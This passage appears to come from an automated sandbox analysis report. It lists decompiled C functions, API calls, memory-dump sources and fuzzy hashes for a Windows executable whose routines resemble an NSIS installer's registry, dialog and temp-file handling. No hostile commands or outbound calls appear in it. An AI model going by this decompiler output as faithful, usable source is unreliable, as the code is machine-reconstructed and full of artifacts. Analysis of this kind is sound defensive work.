                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402374
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso7CE9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso7CE9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CD
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso7CE9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp
                                                                                    • API String ID: 1356686001-1226934969
                                                                                    • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                    • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                                                    • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                    • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                    				void* _v8;
                                                                                    				char _v272;
                                                                                    				long _t18;
                                                                                    				intOrPtr* _t27;
                                                                                    				long _t28;
                                                                                    
                                                                                    				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42ecd0 | 0x00000008,  &_v8);
                                                                                    				if(_t18 == 0) {
                                                                                    					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                    						if(_a12 != 0) {
                                                                                    							RegCloseKey(_v8);
                                                                                    							L8:
                                                                                    							return 1;
                                                                                    						}
                                                                                    						if(E00402A69(_v8,  &_v272, 0) != 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    					}
                                                                                    					RegCloseKey(_v8);
                                                                                    					_t27 = E00405F57(4);
                                                                                    					if(_t27 == 0) {
                                                                                    						if( *0x42ecd0 != 0) {
                                                                                    							goto L8;
                                                                                    						}
                                                                                    						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                    						if(_t28 != 0) {
                                                                                    							goto L8;
                                                                                    						}
                                                                                    						return _t28;
                                                                                    					}
                                                                                    					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
                                                                                    				}
                                                                                    				return _t18;
                                                                                    			}








                                                                                    0x00402a8a
                                                                                    0x00402a92
                                                                                    0x00402aba
                                                                                    0x00402aa4
                                                                                    0x00402af4
                                                                                    0x00402afa
                                                                                    0x00000000
                                                                                    0x00402afc
                                                                                    0x00402ab8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402ab8
                                                                                    0x00402acf
                                                                                    0x00402ad7
                                                                                    0x00402ade
                                                                                    0x00402b0a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402b12
                                                                                    0x00402b1a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402b1a
                                                                                    0x00000000
                                                                                    0x00402aed
                                                                                    0x00402b01

                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1912718029-0
                                                                                    • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                    • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                                                    • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                    • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00401CDE(int __edx) {
                                                                                    				void* _t17;
                                                                                    				struct HINSTANCE__* _t21;
                                                                                    				struct HWND__* _t25;
                                                                                    				void* _t27;
                                                                                    
                                                                                    				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                                                    				GetClientRect(_t25, _t27 - 0x50);
                                                                                    				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                                                    				if(_t17 != _t21) {
                                                                                    					DeleteObject(_t17);
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
                                                                                    				return 0;
                                                                                    			}







                                                                                    0x00401ce8
                                                                                    0x00401cef
                                                                                    0x00401d1e
                                                                                    0x00401d26
                                                                                    0x00401d2d
                                                                                    0x00401d2d
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00401CE2
                                                                                    • GetClientRect.USER32 ref: 00401CEF
                                                                                    • LoadImageA.USER32 ref: 00401D10
                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                    • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                                                    • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                    • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                    				char _v36;
                                                                                    				char _v68;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t21;
                                                                                    				signed int _t22;
                                                                                    				void* _t29;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    				void* _t41;
                                                                                    				signed int _t43;
                                                                                    				signed int _t47;
                                                                                    				signed int _t50;
                                                                                    				signed int _t51;
                                                                                    				signed int _t53;
                                                                                    
                                                                                    				_t21 = _a16;
                                                                                    				_t51 = _a12;
                                                                                    				_t41 = 0xffffffdc;
                                                                                    				if(_t21 == 0) {
                                                                                    					_push(0x14);
                                                                                    					_pop(0);
                                                                                    					_t22 = _t51;
                                                                                    					if(_t51 < 0x100000) {
                                                                                    						_push(0xa);
                                                                                    						_pop(0);
                                                                                    						_t41 = 0xffffffdd;
                                                                                    					}
                                                                                    					if(_t51 < 0x400) {
                                                                                    						_t41 = 0xffffffde;
                                                                                    					}
                                                                                    					if(_t51 < 0xffff3333) {
                                                                                    						_t50 = 0x14;
                                                                                    						asm("cdq");
                                                                                    						_t22 = 1 / _t50 + _t51;
                                                                                    					}
                                                                                    					_t23 = _t22 & 0x00ffffff;
                                                                                    					_t53 = _t22 >> 0;
                                                                                    					_t43 = 0xa;
                                                                                    					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                    				} else {
                                                                                    					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                    					_t47 = 0;
                                                                                    				}
                                                                                    				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                    				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
                                                                                    				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
                                                                                    				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                    				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
                                                                                    			}



















                                                                                    0x0040467e
                                                                                    0x00404683
                                                                                    0x0040468b
                                                                                    0x0040468c
                                                                                    0x00404699
                                                                                    0x004046a1
                                                                                    0x004046a2
                                                                                    0x004046a4
                                                                                    0x004046a6
                                                                                    0x004046a8
                                                                                    0x004046ab
                                                                                    0x004046ab
                                                                                    0x004046b2
                                                                                    0x004046b8
                                                                                    0x004046b8
                                                                                    0x004046bf
                                                                                    0x004046c6
                                                                                    0x004046c9
                                                                                    0x004046cc
                                                                                    0x004046cc
                                                                                    0x004046d0
                                                                                    0x004046e0
                                                                                    0x004046e2
                                                                                    0x004046e5
                                                                                    0x0040468e
                                                                                    0x0040468e
                                                                                    0x00404695
                                                                                    0x00404695
                                                                                    0x004046ed
                                                                                    0x004046f8
                                                                                    0x0040470e
                                                                                    0x0040471e
                                                                                    0x0040473a

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                    • wsprintfA.USER32 ref: 0040471E
                                                                                    • SetDlgItemTextA.USER32 ref: 00404731
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                    • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                                                    • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                    • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 51%
                                                                                    			E00401BCA() {
                                                                                    				signed int _t28;
                                                                                    				CHAR* _t31;
                                                                                    				long _t32;
                                                                                    				int _t37;
                                                                                    				signed int _t38;
                                                                                    				int _t42;
                                                                                    				int _t48;
                                                                                    				struct HWND__* _t52;
                                                                                    				void* _t55;
                                                                                    
                                                                                    				 *(_t55 - 8) = E00402A0C(3);
                                                                                    				 *(_t55 + 8) = E00402A0C(4);
                                                                                    				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                                                    					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                                                                    				}
                                                                                    				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                                                    				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                                                    					 *(_t55 + 8) = E00402A29(0x44);
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                                                    				_push(1);
                                                                                    				if(__eflags != 0) {
                                                                                    					_t50 = E00402A29();
                                                                                    					_t28 = E00402A29();
                                                                                    					asm("sbb ecx, ecx");
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t31 =  ~( *_t27) & _t50;
                                                                                    					__eflags = _t31;
                                                                                    					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					_t52 = E00402A0C();
                                                                                    					_t37 = E00402A0C();
                                                                                    					_t48 =  *(_t55 - 0x14) >> 2;
                                                                                    					if(__eflags == 0) {
                                                                                    						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                                                    						L10:
                                                                                    						 *(_t55 - 0xc) = _t32;
                                                                                    					} else {
                                                                                    						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                                                    						asm("sbb eax, eax");
                                                                                    						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                                                    				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                                                    					_push( *(_t55 - 0xc));
                                                                                    					E00405B25();
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
                                                                                    				return 0;
                                                                                    			}












                                                                                    0x00401bd3
                                                                                    0x00401bdf
                                                                                    0x00401be2
                                                                                    0x00401beb
                                                                                    0x00401beb
                                                                                    0x00401bee
                                                                                    0x00401bf2
                                                                                    0x00401bfb
                                                                                    0x00401bfb
                                                                                    0x00401bfe
                                                                                    0x00401c02
                                                                                    0x00401c04
                                                                                    0x00401c51
                                                                                    0x00401c53
                                                                                    0x00401c5c
                                                                                    0x00401c64
                                                                                    0x00401c67
                                                                                    0x00401c67
                                                                                    0x00401c70
                                                                                    0x00000000
                                                                                    0x00401c06
                                                                                    0x00401c0d
                                                                                    0x00401c0f
                                                                                    0x00401c17
                                                                                    0x00401c1a
                                                                                    0x00401c42
                                                                                    0x00401c76
                                                                                    0x00401c76
                                                                                    0x00401c1c
                                                                                    0x00401c2a
                                                                                    0x00401c32
                                                                                    0x00401c35
                                                                                    0x00401c35
                                                                                    0x00401c1a
                                                                                    0x00401c79
                                                                                    0x00401c7c
                                                                                    0x00401c82
                                                                                    0x00402866
                                                                                    0x00402866
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                    • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                                                    • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                    • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004056BA(CHAR* _a4) {
                                                                                    				CHAR* _t7;
                                                                                    
                                                                                    				_t7 = _a4;
                                                                                    				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                    					lstrcatA(_t7, 0x409010);
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}




                                                                                    0x004056bb
                                                                                    0x004056d2
                                                                                    0x004056da
                                                                                    0x004056da
                                                                                    0x004056e2

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                    • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3916508600
                                                                                    • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                    • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                                                    • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                    • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 67%
                                                                                    			E00401D38() {
                                                                                    				void* __esi;
                                                                                    				int _t6;
                                                                                    				signed char _t11;
                                                                                    				struct HFONT__* _t14;
                                                                                    				void* _t18;
                                                                                    				void* _t24;
                                                                                    				void* _t26;
                                                                                    				void* _t28;
                                                                                    
                                                                                    				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                                    				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
                                                                                    				 *0x40b054 = E00402A0C(3);
                                                                                    				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                                                                    				 *0x40b05b = 1;
                                                                                    				 *0x40b058 = _t11 & 0x00000001;
                                                                                    				 *0x40b059 = _t11 & 0x00000002;
                                                                                    				 *0x40b05a = _t11 & 0x00000004;
                                                                                    				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
                                                                                    				_t14 = CreateFontIndirectA(0x40b044);
                                                                                    				_push(_t14);
                                                                                    				_push(_t26);
                                                                                    				E00405B25();
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x00401d46
                                                                                    0x00401d5f
                                                                                    0x00401d69
                                                                                    0x00401d6e
                                                                                    0x00401d79
                                                                                    0x00401d80
                                                                                    0x00401d92
                                                                                    0x00401d98
                                                                                    0x00401d9d
                                                                                    0x00401da7
                                                                                    0x004024eb
                                                                                    0x00401561
                                                                                    0x00402866
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401D3F
                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                    • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirect
                                                                                    • String ID:
                                                                                    • API String ID: 3272661963-0
                                                                                    • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                    • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                                                    • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                    • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00402BF1(intOrPtr _a4) {
                                                                                    				long _t2;
                                                                                    				struct HWND__* _t3;
                                                                                    				struct HWND__* _t6;
                                                                                    
                                                                                    				if(_a4 == 0) {
                                                                                    					__eflags =  *0x420c48; // 0x0
                                                                                    					if(__eflags == 0) {
                                                                                    						_t2 = GetTickCount();
                                                                                    						__eflags = _t2 -  *0x42ec2c;
                                                                                    						if(_t2 >  *0x42ec2c) {
                                                                                    							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
                                                                                    							 *0x420c48 = _t3;
                                                                                    							return ShowWindow(_t3, 5);
                                                                                    						}
                                                                                    						return _t2;
                                                                                    					} else {
                                                                                    						return E00405F93(0);
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t6 =  *0x420c48; // 0x0
                                                                                    					if(_t6 != 0) {
                                                                                    						_t6 = DestroyWindow(_t6);
                                                                                    					}
                                                                                    					 *0x420c48 = 0;
                                                                                    					return _t6;
                                                                                    				}
                                                                                    			}






                                                                                    0x00402bf8
                                                                                    0x00402c12
                                                                                    0x00402c18
                                                                                    0x00402c22
                                                                                    0x00402c28
                                                                                    0x00402c2e
                                                                                    0x00402c3f
                                                                                    0x00402c48
                                                                                    0x00000000
                                                                                    0x00402c4d
                                                                                    0x00402c54
                                                                                    0x00402c1a
                                                                                    0x00402c21
                                                                                    0x00402c21
                                                                                    0x00402bfa
                                                                                    0x00402bfa
                                                                                    0x00402c01
                                                                                    0x00402c04
                                                                                    0x00402c04
                                                                                    0x00402c0a
                                                                                    0x00402c11
                                                                                    0x00402c11

                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                    • GetTickCount.KERNEL32 ref: 00402C22
                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                    • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                    • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                    • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004038E3(void* __ecx, void* __eflags) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed short _t6;
                                                                                    				intOrPtr _t11;
                                                                                    				signed int _t13;
                                                                                    				signed int _t16;
                                                                                    				signed short* _t18;
                                                                                    				signed int _t20;
                                                                                    				signed short* _t23;
                                                                                    				intOrPtr _t25;
                                                                                    				signed int _t26;
                                                                                    				intOrPtr* _t27;
                                                                                    
                                                                                    				_t24 = "1033";
                                                                                    				_t13 = 0xffff;
                                                                                    				_t6 = E00405B3E(__ecx, "1033");
                                                                                    				while(1) {
                                                                                    					_t26 =  *0x42ec64;
                                                                                    					if(_t26 == 0) {
                                                                                    						goto L7;
                                                                                    					}
